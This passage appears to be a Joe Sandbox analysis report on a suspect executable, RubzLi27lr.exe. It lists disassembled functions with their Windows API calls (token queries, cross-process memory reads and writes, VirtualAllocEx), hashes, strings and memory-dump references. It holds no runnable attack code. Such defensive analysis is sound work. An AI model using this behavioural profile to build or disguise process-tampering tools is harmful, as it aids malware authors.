                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 842720411-0
                                                                                                                  • Opcode ID: f7428654383f0791aba8ef101faecbb3aa4a6e336f63fe84ed36abeab33a1295
                                                                                                                  • Instruction ID: 5e465e244709b741a5dada62e32a87701fdfb9d0fe970539d6aa0e6f94c5923d
                                                                                                                  • Opcode Fuzzy Hash: f7428654383f0791aba8ef101faecbb3aa4a6e336f63fe84ed36abeab33a1295
                                                                                                                  • Instruction Fuzzy Hash: 36016D79101205BFDB514FA9DC49AAA3FAEFF87764B200454FA41D3360DE31DD508A60
                                                                                                                  Function 00B10FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B10FCA
                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B10FD6
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B10FE5
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B10FEC
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B11002
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 44706859-0
                                                                                                                  • Opcode ID: 59b5abe076b7a210d11eea71b982a35fc82c8eb7e15e17cac0500622fcf580c6
                                                                                                                  • Instruction ID: 3e10310dfa67d6bbe77ef3ab150c5af7ee1e06012b04fb043ad408807c5dfb03
                                                                                                                  • Opcode Fuzzy Hash: 59b5abe076b7a210d11eea71b982a35fc82c8eb7e15e17cac0500622fcf580c6
                                                                                                                  • Instruction Fuzzy Hash: 83F04F39602301ABD7214FA89C4DF963FADFF8AB61F504454FA45D7251CE70DD808A60
                                                                                                                  Function 00B11014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B1102A
                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B11036
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B11045
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B1104C
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B11062
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 44706859-0
                                                                                                                  • Opcode ID: 99f7cc35eb21d1845b656e4212cf1f3de69e8cb4e095286b3c053f31355732ee
                                                                                                                  • Instruction ID: c14bfb41bab1497b21d11097af1e1f22a40fe9f7282e17d833111c9914fe0495
                                                                                                                  • Opcode Fuzzy Hash: 99f7cc35eb21d1845b656e4212cf1f3de69e8cb4e095286b3c053f31355732ee
                                                                                                                  • Instruction Fuzzy Hash: FBF04F39602301ABD7215FA9EC4DF963FADFF8AB61F500414FA45D7250CE70D980CA60
                                                                                                                  Function 00B2030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00B2017D,?,00B232FC,?,00000001,00AF2592,?), ref: 00B20324
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00B2017D,?,00B232FC,?,00000001,00AF2592,?), ref: 00B20331
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00B2017D,?,00B232FC,?,00000001,00AF2592,?), ref: 00B2033E
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00B2017D,?,00B232FC,?,00000001,00AF2592,?), ref: 00B2034B
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00B2017D,?,00B232FC,?,00000001,00AF2592,?), ref: 00B20358
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00B2017D,?,00B232FC,?,00000001,00AF2592,?), ref: 00B20365
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2962429428-0
                                                                                                                  • Opcode ID: 110daa32bd344c99afee9af2585a962280f8a20569ac3d163ef321c486747c0b
                                                                                                                  • Instruction ID: dafc285a2cc8428af94cfbdf52ba056c47cabdc7f0f4d2d37881d2a644abac1e
                                                                                                                  • Opcode Fuzzy Hash: 110daa32bd344c99afee9af2585a962280f8a20569ac3d163ef321c486747c0b
                                                                                                                  • Instruction Fuzzy Hash: 8F01A272811B259FC730AF66E880412FBF5FF543153158A7FD19A52932C771A954CF84
                                                                                                                  Function 00AED73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00AED752
                                                                                                                    • Part of subcall function 00AE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000), ref: 00AE29DE
                                                                                                                    • Part of subcall function 00AE29C8: GetLastError.KERNEL32(00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000,00000000), ref: 00AE29F0
                                                                                                                  • _free.LIBCMT ref: 00AED764
                                                                                                                  • _free.LIBCMT ref: 00AED776
                                                                                                                  • _free.LIBCMT ref: 00AED788
                                                                                                                  • _free.LIBCMT ref: 00AED79A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: ebb26d7629a4e3902baf9b9c9ba8e54c23a91bee16b29b3242297f88f1631c23
                                                                                                                  • Instruction ID: d5b7dd3a6c1991287971cd2e9d03d9cf31bad7f35cfdc694d0990d5a2a24cf71
                                                                                                                  • Opcode Fuzzy Hash: ebb26d7629a4e3902baf9b9c9ba8e54c23a91bee16b29b3242297f88f1631c23
                                                                                                                  • Instruction Fuzzy Hash: C7F03032544288AB8661FB6AFAC6D1A7BDDBB84710BA51C0DF05CE7502CB34FCC08B64
                                                                                                                  Function 00B15C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00B15C58
                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B15C6F
                                                                                                                  • MessageBeep.USER32(00000000), ref: 00B15C87
                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 00B15CA3
                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00B15CBD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3741023627-0
                                                                                                                  • Opcode ID: a9045ce6609e2413c93dcf0860884fd491225be009de745a604f7f88012cbe1c
                                                                                                                  • Instruction ID: bf9f989c45714d20be75a50b122501b61ff63dc466adb482f1884fa623220545
                                                                                                                  • Opcode Fuzzy Hash: a9045ce6609e2413c93dcf0860884fd491225be009de745a604f7f88012cbe1c
                                                                                                                  • Instruction Fuzzy Hash: 74018634501B04EBEB305F10DD4EFE67BF8FB41B05F411599A693A20E1DFF4AA848A90
                                                                                                                  Function 00AE22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00AE22BE
                                                                                                                    • Part of subcall function 00AE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000), ref: 00AE29DE
                                                                                                                    • Part of subcall function 00AE29C8: GetLastError.KERNEL32(00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000,00000000), ref: 00AE29F0
                                                                                                                  • _free.LIBCMT ref: 00AE22D0
                                                                                                                  • _free.LIBCMT ref: 00AE22E3
                                                                                                                  • _free.LIBCMT ref: 00AE22F4
                                                                                                                  • _free.LIBCMT ref: 00AE2305
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: fa6485b4ffb0b9230f02cd6653c4ff74a90df7bd8d0185ed4f4699d3d145c84a
                                                                                                                  • Instruction ID: 4e784eaa98fe1a4f70bffa7b6ee8ea931e24f7246ddc0262614cf551a527ffb2
                                                                                                                  • Opcode Fuzzy Hash: fa6485b4ffb0b9230f02cd6653c4ff74a90df7bd8d0185ed4f4699d3d145c84a
                                                                                                                  • Instruction Fuzzy Hash: ECF05EB18111648B8622BF59BD02A583FACFB687A0702590EF524D72B2CF340852EFE5
                                                                                                                  Function 00AC95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • EndPath.GDI32(?), ref: 00AC95D4
                                                                                                                  • StrokeAndFillPath.GDI32(?,?,00B071F7,00000000,?,?,?), ref: 00AC95F0
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00AC9603
                                                                                                                  • DeleteObject.GDI32 ref: 00AC9616
                                                                                                                  • StrokePath.GDI32(?), ref: 00AC9631
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2625713937-0
                                                                                                                  • Opcode ID: 83970f9637d58eb8ff661f6890fc06be884c908b117e4f54beb128c7376b2b49
                                                                                                                  • Instruction ID: 14026db961608856805fc6c1bf6b69a5d5734094739d160afb4248d898d3dfd7
                                                                                                                  • Opcode Fuzzy Hash: 83970f9637d58eb8ff661f6890fc06be884c908b117e4f54beb128c7376b2b49
                                                                                                                  • Instruction Fuzzy Hash: E7F0F234007608EBDB265F69ED1CB653F69BB02722F058618E425661F1CF308A97DF20
                                                                                                                  Function 00AE0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$_free
                                                                                                                  • String ID: a/p$am/pm
                                                                                                                  • API String ID: 3432400110-3206640213
                                                                                                                  • Opcode ID: e03e62e5ab3b1e2df877c80db69ccde649a03e362aa92927ea5ffa69162c0487
                                                                                                                  • Instruction ID: c092b8da64ac7ac3a1e81ab6d36b29135472b8cd2472d576faeee8c1d713d1ab
                                                                                                                  • Opcode Fuzzy Hash: e03e62e5ab3b1e2df877c80db69ccde649a03e362aa92927ea5ffa69162c0487
                                                                                                                  • Instruction Fuzzy Hash: 23D115719002E6CADB649F6AC895BFEB7B1FF05300F284269EA01AF654D3759D80CB91
                                                                                                                  Function 00B37B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AD0242: EnterCriticalSection.KERNEL32(00B8070C,00B81884,?,?,00AC198B,00B82518,?,?,?,00AB12F9,00000000), ref: 00AD024D
                                                                                                                    • Part of subcall function 00AD0242: LeaveCriticalSection.KERNEL32(00B8070C,?,00AC198B,00B82518,?,?,?,00AB12F9,00000000), ref: 00AD028A
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00AD00A3: __onexit.LIBCMT ref: 00AD00A9
                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00B37BFB
                                                                                                                    • Part of subcall function 00AD01F8: EnterCriticalSection.KERNEL32(00B8070C,?,?,00AC8747,00B82514), ref: 00AD0202
                                                                                                                    • Part of subcall function 00AD01F8: LeaveCriticalSection.KERNEL32(00B8070C,?,00AC8747,00B82514), ref: 00AD0235
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                  • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                                  • API String ID: 535116098-3733170431
                                                                                                                  • Opcode ID: df47930211e526cd8204183dbeaf11a2ca92d67369e0239e60340ad75b54e380
                                                                                                                  • Instruction ID: 2edaa5bedcc7a45369970e32bf71014c5cd00f0cfb02e1c943161f860950d215
                                                                                                                  • Opcode Fuzzy Hash: df47930211e526cd8204183dbeaf11a2ca92d67369e0239e60340ad75b54e380
                                                                                                                  • Instruction Fuzzy Hash: EB918CB4A44209EFCB24EF94D991DADB7F5FF45700F608099F8069B2A2DB31AE41CB51
                                                                                                                  Function 00B12716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B1B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B121D0,?,?,00000034,00000800,?,00000034), ref: 00B1B42D
                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B12760
                                                                                                                    • Part of subcall function 00B1B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B121FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00B1B3F8
                                                                                                                    • Part of subcall function 00B1B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00B1B355
                                                                                                                    • Part of subcall function 00B1B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B12194,00000034,?,?,00001004,00000000,00000000), ref: 00B1B365
                                                                                                                    • Part of subcall function 00B1B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B12194,00000034,?,?,00001004,00000000,00000000), ref: 00B1B37B
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B127CD
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B1281A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                  • Opcode ID: fff786aa21fe5511e7e9045b9fde79bf28d6d6f5a636469d0ea8d1322498f1c5
                                                                                                                  • Instruction ID: 00ff54255e2a4d97f534145060c828a5e718088ec0c3acf67d870e7ed7f246b9
                                                                                                                  • Opcode Fuzzy Hash: fff786aa21fe5511e7e9045b9fde79bf28d6d6f5a636469d0ea8d1322498f1c5
                                                                                                                  • Instruction Fuzzy Hash: 9E414C76900218AFDB10DFA4CD81EEEBBB8EF09700F408095FA55B7181DB706E85CBA0
                                                                                                                  Function 00AE172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RubzLi27lr.exe,00000104), ref: 00AE1769
                                                                                                                  • _free.LIBCMT ref: 00AE1834
                                                                                                                  • _free.LIBCMT ref: 00AE183E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                  • String ID: C:\Users\user\Desktop\RubzLi27lr.exe
                                                                                                                  • API String ID: 2506810119-3827172066
                                                                                                                  • Opcode ID: cb19aa301ca0ef44e09d49c0244818dda640fb84b0802eb191da6cae8f34dc6c
                                                                                                                  • Instruction ID: 095a78ca77637a22771325a4fc5171d12c19720b60c9efe306b11507e9faa6e4
                                                                                                                  • Opcode Fuzzy Hash: cb19aa301ca0ef44e09d49c0244818dda640fb84b0802eb191da6cae8f34dc6c
                                                                                                                  • Instruction Fuzzy Hash: F931A171A012A8EFDB21DF9ADD81D9EBBFCEF85710B1041AAF805D7211DA708E41CB90
                                                                                                                  Function 00B1C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B1C306
                                                                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00B1C34C
                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B81990,017E4C38), ref: 00B1C395
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Delete$InfoItem
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 135850232-4108050209
                                                                                                                  • Opcode ID: 44d0afc95a90c1a00b122fb84b14ef88e174d1c519dcf5b2e800c22c21e2d8a5
                                                                                                                  • Instruction ID: be2305150d93d3618c41856d193f17b43eba44cccfb9b380b71b8f088b353a36
                                                                                                                  • Opcode Fuzzy Hash: 44d0afc95a90c1a00b122fb84b14ef88e174d1c519dcf5b2e800c22c21e2d8a5
                                                                                                                  • Instruction Fuzzy Hash: 9041C1312443019FD720DF24E885B9ABFE8EF85310F50869EF9A5972D2C730E944CB5A
                                                                                                                  Function 00B44416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B4CC08,00000000,?,?,?,?), ref: 00B444AA
                                                                                                                  • GetWindowLongW.USER32 ref: 00B444C7
                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B444D7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
